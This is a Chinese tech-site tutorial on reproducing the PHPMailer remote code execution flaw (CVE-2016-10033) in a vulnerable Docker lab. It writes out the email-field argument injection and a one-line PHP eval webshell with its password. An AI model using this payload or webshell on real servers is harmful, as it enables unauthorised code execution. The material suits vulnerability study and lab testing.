溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶(hù)服務(wù)條款》

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞

發(fā)布時(shí)間:2021-06-30 14:57:10 來(lái)源:億速云 閱讀:361 作者:Leah 欄目:安全技術(shù)

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞,相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策,為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法,通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

一、漏洞簡(jiǎn)介

PHPMailer是PHP電子郵件創(chuàng)建及傳輸類(lèi),用于多個(gè)開(kāi)源項(xiàng)目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者在Web服務(wù)器用戶(hù)上下文中執(zhí)行任意代碼,遠(yuǎn)程控制目標(biāo)web應(yīng)用。

二、影響版本:

PHPMailer<5.2.18

三、漏洞復(fù)現(xiàn)

Docker環(huán)境:

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去鏡像啟動(dòng)環(huán)境:

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name處隨便輸入比如“aaa”,在email處輸入:"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message處輸入一句話(huà)木馬:<?php@eval($_POST['thelostworld']);?>

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞

上傳完一句話(huà)木馬后,頁(yè)面會(huì)響應(yīng)3-5分鐘,響應(yīng)時(shí)間較長(zhǎng)

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞

木馬地址:http://192.168.1.107:8080/a.php 密碼:thelostworld

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞

虛擬終端:

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞

使用腳本:

獲取腳本后臺(tái)回復(fù)“PHPMailer”獲取腳本

PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞

看完上述內(nèi)容,你們掌握PHPMailer中怎么復(fù)現(xiàn)遠(yuǎn)程命令執(zhí)行漏洞的方法了嗎?如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容,歡迎關(guān)注億速云行業(yè)資訊頻道,感謝各位的閱讀!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI